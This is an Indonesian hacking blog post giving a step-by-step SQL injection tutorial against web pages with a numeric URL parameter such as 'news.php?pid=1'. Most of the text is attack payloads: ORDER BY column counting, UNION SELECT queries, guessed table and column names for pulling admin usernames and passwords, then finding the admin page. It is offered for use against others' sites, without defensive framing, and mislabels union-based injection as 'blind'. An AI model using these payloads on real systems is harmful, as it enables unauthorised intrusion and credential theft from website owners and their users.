Rabu, 05 Mei 2010

Simple Blind SQL Injection Method

Simple Blind SQL Injection Method

14 November 2009
Penulis: d3r1lo1o1 · Kategori Artikel: Hacking
Binus Hacker Sponsor Banner


Simple Blind SQL Injection Methode V4 Tutorial
Langkah Pertama:

Find the target
ex: /news.php?pid=1

Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau

===========
=step two=
===========

find and count to amount the table in database.
use the command : order by

es: [site]/news.php?pid=-1+order+by+1–

chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–

so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–

so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–

============
=step three=
============

for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–

=============
=step four:=
=============

find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users

use command +from+(table_name)–

ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error

and you can see the number is appear for example 2
go to the next step

============
=step five=
============

find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc

last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–

example appear : admin
admin is username

for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc

ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–

example appear : 123456
123456 is password

===============
=step six:=
===============

ok in the last step you must find admin page

ex : website.com/admin

sorry bhs inggris hehehehe..

=====================
: Special thx to :
Allah SWT

: My teacher :
vyc0d, Gonzhack
=====================
: thx to :
MR.FRIBO, DHIYAT, BOBYHIKARU, N4CK0, RAJEZ, AZZURE,SICK_HACKER, mas UTUH
AA EZHA, crusdd2, DIMAZ,DUDULS, slalu_ngantuk,ku51_g0y4n9 & BEJAMZ
: thx for the team :
N.G.U TEAM, CYBERDOS TEAM, HACKER NEWBIE TEAM, XPGROUND TEAM, DEVILZC0DE, TECON CREW, IDC
=====================
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Setelah membaca artikel di atas.
Apa komentar anda ??

Langganan: Posting Komentar (Atom)